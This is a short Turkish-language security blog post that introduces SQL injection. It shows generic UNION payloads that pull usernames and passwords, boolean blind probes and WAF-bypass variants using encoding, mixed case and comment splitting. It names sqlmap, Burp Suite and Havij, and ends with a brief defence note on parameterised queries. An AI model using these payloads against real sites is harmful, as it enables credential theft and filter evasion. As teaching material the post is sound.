bleadow_
~/yazılar/sql-injection-ileri-seviye
Web GüvenliğiOrta 12 dk

// SQL Injection: Temel Tekniklerden İleri Seviye Bypass'a

WAF atlatma yöntemleri, blind injection teknikleri ve gerçek dünya senaryolarıyla SQL injection'ın derinliklerine dalıyoruz.

#sql#injection#waf#bypass#owasp
sql-injection-ileri-seviye.md — bleadow

## Giriş

SQL Injection (SQLi), web uygulamalarındaki en yaygın ve tehlikeli güvenlik açıklarından biridir. OWASP Top 10 listesinde yıllardır üst sıralarda yer alır.

## Temel Kavramlar

-- Klasik UNION tabanlı injection
' UNION SELECT null, username, password FROM users--

-- Boolean tabanlı blind injection
' AND 1=1-- (true)
' AND 1=2-- (false)

## WAF Bypass Teknikleri

Modern WAF'ları atlatmak için çeşitli encoding ve obfuscation teknikleri kullanılır:

-- URL encoding
%27%20UNION%20SELECT%20null--

-- Case variation
' uNiOn SeLeCt null--

-- Comment injection
' UN/**/ION SEL/**/ECT null--

## Araçlar

sqlmap: Otomatik SQLi tespiti ve exploitation
Burp Suite: Manuel test ve intercept
Havij: (Eğitim amaçlı)

## Savunma

Parametreli sorgular ve ORM kullanımı SQLi'yi büyük ölçüde engeller.

cd ../yazılar
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
bleadow_
Güvenlik araştırmaları. Exploit analizleri. Hacker kültürü.
root@bleadow:~$ ©2026 Bleadow. Tüm hakları saklıdır.